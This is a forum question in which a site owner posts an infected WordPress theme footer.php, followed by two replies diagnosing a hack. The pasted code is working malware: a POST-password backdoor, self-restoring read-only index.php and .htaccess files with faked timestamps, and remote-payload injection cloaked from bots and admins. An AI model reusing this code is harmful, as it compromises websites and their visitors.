# What is this code in my theme's footer.php causing chmod permission warnings?

Tags: redirect, permissions, code, footer, hacked

I am stumped on this and can't seem to fix the issue. I removed the code, that didn't work as it came back. I tried looking throughout my theme's files and can't see anything else.

Does anyone have a clue? And if so, how do I correct it?

```
                            </div>
    </div>
    <?php //istart

function my_time($dir) {
    foreach (glob($dir . '/wp-*.php') as $f) {
        $times[] = filemtime($f);
    }
    $max = 1;
    for ($i = 0; $i < count($times) - 1; $i++) {
        $k = 1;
        for ($j = $i + 1; $j < count($times); $j++) {
            if ($times[$i] == $times[$j]) {
                $k++;
                if ($k > $max) {
                    $max = $k;
                    $time = $times[$i];
                }
            }
        }
    }
    return $time;
}

function my_correct($dir) {
    $time = 0;
    $path = $dir . '/index.php';
    $content = base64_decode('PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==');
    if (file_get_contents($path) != $content) {
        chmod($path, 0644);
        file_put_contents($path, $content);
        chmod($path, 0444);
        $time = my_time($dir);
        touch($path, $time);
    }

    $path = $dir . '/.htaccess';
    $content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
    if (file_exists($path) AND file_get_contents($path) != $content) {
        chmod($path, 0644);
        file_put_contents($path, $content);
        chmod($path, 0444);
        if (!$time) {
            $time = my_time($dir);
        }
        touch($path, $time);
    }
}

$p = $_POST;
$_passssword = 'b6d23d6b8d285b8003a7529248136d13';
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
my_correct(dirname(__FILE__) . '/..');

function request_url_data($url) {
    if(!is_valid_url($url))
        return false;

    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

error_reporting(0);

//unset($_passssword);

if (function_exists("add_action")) {
    add_action('wp_head', 'add_2head');
    add_action('wp_footer', 'add_2footer');
}

function add_2head() {
    ob_start();
}

function is_valid_url(&$url)
{
    if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
        return false;
    $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
    return true;
}

function add_2footer() {
    $check = false;
    $check_data = "";
    if (!empty($_GET['check']) AND $_GET['check'] == 'b6d23d6b8d285b8003a7529248136d13') {
        $check = true;
        $check_data = ('<!--checker_start ');
        $check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
        $check_data .= (' checker_end-->');
    }

    if (!$check) {
        if ($_SERVER['REQUEST_METHOD'] != 'GET')
            return;
        if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
            return;


        $cookie_name = 'PHP_SESSION_PHP';
        if (isset($_COOKIE[$cookie_name]))
            return;

        foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
            if (preg_match($regex, $_SERVER['REQUEST_URI']))
                return;
        }

    }

    $buffer = ob_get_clean();
    ob_start();
    $regexp = '/<body[^>]*>/is';
    if (preg_match($regexp, $buffer, $m)) {
        $body = $m[0];
//        $url = base64_decode('a3d3czksLDIxNC07Oi0xMzItMjA7LGFvbGQsPG5ibWBrZnB3ZnEldnduXHBsdnFgZj4yOjcyOTIzNDU7Njc5MTMxNQ==');
        $url = decrypt_url('a3d3czksLDIxNC07Oi0xMzItMjA7LGFvbGQsPG5ibWBrZnB3ZnEldnduXHBsdnFgZj4yOjcyOTIzNDU7Njc5MTMxNQ==');
//        if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
        if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
//            $body .=  '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
//            $body .= base64_decode($m[0]);
            $body .= $decoded;
//            $body .= base64_decode($m[0]);
        }
        $body .= $check_data;

        $buffer = preg_replace($regexp, $body, $buffer);
    }
    echo $buffer;
    ob_flush();
}

function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}//iend

       global $data; ?>
    <?php if($data['footer_widgets']): ?>
    <footer class="footer-area">
        <div class="avada-row">
            <section class="columns columns-<?php echo $data['footer_widgets_columns']; ?>">
                <article class="col">
                <?php
                if (!function_exists('dynamic_sidebar') || !dynamic_sidebar('Footer Widget 1')): 
                endif;
                ?>
                </article>

                <article class="col">
                <?php
                if (!function_exists('dynamic_sidebar') || !dynamic_sidebar('Footer Widget 2')): 
                endif;
                ?>
                </article>

                <article class="col">
                <?php
                if (!function_exists('dynamic_sidebar') || !dynamic_sidebar('Footer Widget 3')): 
                endif;
                ?>
                </article>

                <article class="col last">
                <?php
                if (!function_exists('dynamic_sidebar') || !dynamic_sidebar('Footer Widget 4')): 
                endif;
                ?>
                </article>
            </section>
        </div>
    </footer>
    <?php endif; ?>
    <?php if($data['footer_copyright']): ?>
    <footer id="footer">
        <div class="avada-row">
            <?php if($data['icons_footer']): ?>
            <ul class="social-networks">
                <?php if($data['facebook_link']): ?>
                <li><a href="<?php echo $data['facebook_link']; ?>" class="facebook">facebook</a>
                    <div class="popup">
                        <div class="holder">
                            <p>Facebook</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['twitter_link']): ?>
                <li><a href="<?php echo $data['twitter_link']; ?>" class="twitter">twitter</a>
                    <div class="popup">
                        <div class="holder">
                            <p>Twitter</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['linkedin_link']): ?>
                <li><a href="<?php echo $data['linkedin_link']; ?>" class="linked-in">linked in</a>
                    <div class="popup">
                        <div class="holder">
                            <p>LinkedIn</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['rss_link']): ?>
                <li><a href="<?php echo $data['rss_link']; ?>" class="rss">rss</a>
                    <div class="popup">
                        <div class="holder">
                            <p>RSS</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['dribbble_link']): ?>
                <li><a href="<?php echo $data['dribbble_link']; ?>" class="dribbble">dribbble</a>
                    <div class="popup">
                        <div class="holder">
                            <p>Dribbble</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['youtube_link']): ?>
                <li class="custom"><a href="<?php echo $data['youtube_link']; ?>" class="youtube"><img src="<?php bloginfo('template_directory'); ?>/images/youtube.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Youtube</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['pinterest_link']): ?>
                <li class="custom"><a href="<?php echo $data['pinterest_link']; ?>" class="pinterest"><img src="<?php bloginfo('template_directory'); ?>/images/pinterest.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Pinterest</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['flickr_link']): ?>
                <li class="custom"><a href="<?php echo $data['flickr_link']; ?>" class="flickr"><img src="<?php bloginfo('template_directory'); ?>/images/flickr.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Flickr</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['vimeo_link']): ?>
                <li class="custom"><a href="<?php echo $data['vimeo_link']; ?>" class="vimeo"><img src="<?php bloginfo('template_directory'); ?>/images/vimeo.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Vimeo</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['tumblr_link']): ?>
                <li class="custom"><a href="<?php echo $data['tumblr_link']; ?>" class="tumblr"><img src="<?php bloginfo('template_directory'); ?>/images/tumblr.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Tumblr</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['google_link']): ?>
                <li class="custom"><a href="<?php echo $data['google_link']; ?>" class="google"><img src="<?php bloginfo('template_directory'); ?>/images/google.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Google</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['digg_link']): ?>
                <li class="custom"><a href="<?php echo $data['digg_link']; ?>" class="digg"><img src="<?php bloginfo('template_directory'); ?>/images/digg.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Digg</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['blogger_link']): ?>
                <li class="custom"><a href="<?php echo $data['blogger_link']; ?>" class="blogger"><img src="<?php bloginfo('template_directory'); ?>/images/blogger.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Blogger</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['skype_link']): ?>
                <li class="custom"><a href="<?php echo $data['skype_link']; ?>" class="skype"><img src="<?php bloginfo('template_directory'); ?>/images/skype.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Skype</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['myspace_link']): ?>
                <li class="custom"><a href="<?php echo $data['myspace_link']; ?>" class="myspace"><img src="<?php bloginfo('template_directory'); ?>/images/myspace.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Myspace</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['deviantart_link']): ?>
                <li class="custom"><a href="<?php echo $data['deviantart_link']; ?>" class="deviantart"><img src="<?php bloginfo('template_directory'); ?>/images/deviantart.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Deviantart</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['yahoo_link']): ?>
                <li class="custom"><a href="<?php echo $data['yahoo_link']; ?>" class="yahoo"><img src="<?php bloginfo('template_directory'); ?>/images/yahoo.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Yahoo</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['reddit_link']): ?>
                <li class="custom"><a href="<?php echo $data['reddit_link']; ?>" class="reddit"><img src="<?php bloginfo('template_directory'); ?>/images/reddit.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Reddit</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['forrst_link']): ?>
                <li class="custom"><a href="<?php echo $data['forrst_link']; ?>" class="forrst"><img src="<?php bloginfo('template_directory'); ?>/images/forrst.png" alt="" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p>Forrst</p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
                <?php if($data['custom_icon_name'] && $data['custom_icon_link'] && $data['custom_icon_image']): ?>
                <li class="custom"><a href="<?php echo $data['custom_icon_link']; ?>"><img src="<?php echo $data['custom_icon_image']; ?>" alt="<?php echo $data['custom_icon_name']; ?>" /></a>
                    <div class="popup">
                        <div class="holder">
                            <p><?php echo $data['custom_icon_name']; ?></p>
                        </div>
                    </div>
                </li>
                <?php endif; ?>
            </ul>
            <?php endif; ?>
            <ul class="copyright">
                <li><?php echo $data['footer_text'] ?></li>
            </ul>
        </div>
    </footer>
    <?php endif; ?>
    </div><!-- wrapper -->
    <?php //include_once('style_selector.php'); ?>
    <?php echo $data['space_body']; ?>
    <?php wp_footer(); ?>
</body>
</html>
```

Comment: Probably hacked. Contact your Host and/or Theme Devs.

Comment: definitely hacked, it is overwriting to index.php and .htaccess too, and stealing all your session cookies... suspend the account, probably need a fresh copy of wordpress and don't forget to change your cookie salts and reset all passwords.